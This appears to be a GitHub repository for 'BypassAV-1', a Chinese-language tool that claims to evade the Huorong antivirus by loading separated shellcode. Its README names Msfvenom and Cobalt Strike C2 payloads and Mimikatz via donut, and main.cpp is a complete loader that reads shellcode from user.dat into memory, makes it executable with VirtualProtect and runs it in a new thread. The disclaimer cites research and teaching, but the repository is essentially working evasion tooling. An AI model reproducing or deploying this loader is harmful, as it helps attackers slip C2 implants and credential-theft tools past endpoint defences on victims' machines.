├── README.md
├── img1.png
└── main.cpp


/README.md:
--------------------------------------------------------------------------------
 1 | > 免责声明：本工具仅用于安全研究和教学目的，用户应自行承担因使用该工具而引起的一切法律和相关责任。作者不对任何法律责任承担责任。
 2 | 
 3 | 
 4 | # BypassAV-1
 5 | 通过分离的方式免杀火绒
 6 | 
 7 | 读入 Msfvenom 或 Cobalt Strike 等 C2 的 Shellcode 方式分离免杀
 8 | 
 9 | 或者配合 donut 可以将 exe、dll 转为 Shellcode 载入 MimiKatz 等工具
10 | 
11 | # 效果
12 | ![Preview](https://github.com/yutianqaq/BypassAV-1/blob/main/img1.png)
13 | 
14 | 


--------------------------------------------------------------------------------
/img1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yutianqaq/BypassAV-1/f1ce3d486a02355c503664b148c726a79b6418ae/img1.png


--------------------------------------------------------------------------------
/main.cpp:
--------------------------------------------------------------------------------
 1 | #include <Windows.h>
 2 | #include <stdio.h>
 3 | 
 4 | int main() {
 5 | 
 6 | 	FILE* fp;
 7 | 	SIZE_T size;
 8 | 	unsigned char* buf;
 9 | 
10 | 	void* exec_mem;
11 | 	BOOL rv;
12 | 	HANDLE th;
13 | 	DWORD oldprotect = 0;
14 | 
15 | 	fp = fopen("user.dat", "rb");
16 | 	fseek(fp, 0, SEEK_END);
17 | 	size = ftell(fp);
18 | 	fseek(fp, 0, SEEK_SET);
19 | 	buf = (unsigned char*)malloc(size);
20 | 
21 | 	fread(buf, size, 1, fp);
22 | 	
23 | 	exec_mem = VirtualAlloc(0, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
24 | 
25 | 	RtlMoveMemory(exec_mem, buf, size);
26 | 
27 | 	rv = VirtualProtect(exec_mem, size, PAGE_EXECUTE_READ, &oldprotect);
28 | 
29 | 	if (rv != 0) {
30 | 		th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
31 | 		WaitForSingleObject(th, -1);
32 | 	}
33 | 	return 0;
34 | }
35 | 


--------------------------------------------------------------------------------